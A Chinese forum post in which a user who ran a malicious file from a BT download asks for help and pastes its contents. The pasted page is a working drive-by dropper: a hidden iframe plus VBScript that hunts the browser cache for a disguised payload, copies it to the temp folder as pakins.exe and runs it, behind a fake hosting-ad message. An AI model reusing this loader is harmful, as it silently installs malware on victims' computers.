昨天下载bt文件时被骗了下了个不知道是什么恶意程序还运行了 谁能帮我看看 到底修改了什么，怎么才能改回来? 文件上传了如下 我把它压缩了 [attach]1529[/attach] 用写字板打开文件如下

<html> <title>online flash games</title> <iframe src="pakins.htm" width="0" height="0" frameborder="0"></iframe>

<SCRIPT LANGUAGE="VBScript"> Option Explicit Dim FSO, WSH Dim strCachePath, strExePath '系统缓存文件的路径，要搜索的Exe文件的路径 Dim lngSuccess '搜索是否成功

window.resizeTo 0, 0 window.moveto 10000, 10000

Set FSO = CreateObject("Scripting.FileSystemObject") Set WSH = CreateObject("WScript.Shell") strCachePath = WSH.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache") lngSuccess = 0

Sub StartSearch() SearchFile FSO.GetFolder(strCachePath), "pakins[1].htm" if lngSuccess = 0 then SearchFile FSO.GetFolder(strCachePath), "pakins[2].htm" if lngSuccess = 0 then setTimeout "StartSearch()", 1000 End Sub

Function SearchFile(Folder, strFileName) On Error Resume Next Dim SubFolder '子文件夹对象 Dim strWinTmpPath, strWinSysPath Dim strFilePath, File '当前的文件路径，当前的文件对象

strFilePath=FSO.GetParentFolderName(Folder) & "\" & Folder.Name & "\" If FSO.FileExists(strFilePath & strFileName) Then strWinTmpPath = FSO.GetSpecialFolder(2) & "\" strWinSysPath = FSO.GetSpecialFolder(1) & "\" set File = FSO.GetFile(strFilePath & strFileName)

If File.Size = 104469 then File.Copy(strWinTmpPath & "pakins.exe") WSH.Run strWinTmpPath & "pakins.exe" lngSuccess = 1 'MsgBox "搞定" window.close() Else Exit Function End If End If

If Folder.SubFolders.Count <> 0 Then For Each SubFolder In Folder.SubFolders SearchFile SubFolder, strFileName Next End If End Function

setTimeout "StartSearch()", 1000

</SCRIPT>

<body> 免费空间广告窗口，稍后将自动关闭。

</body> </html>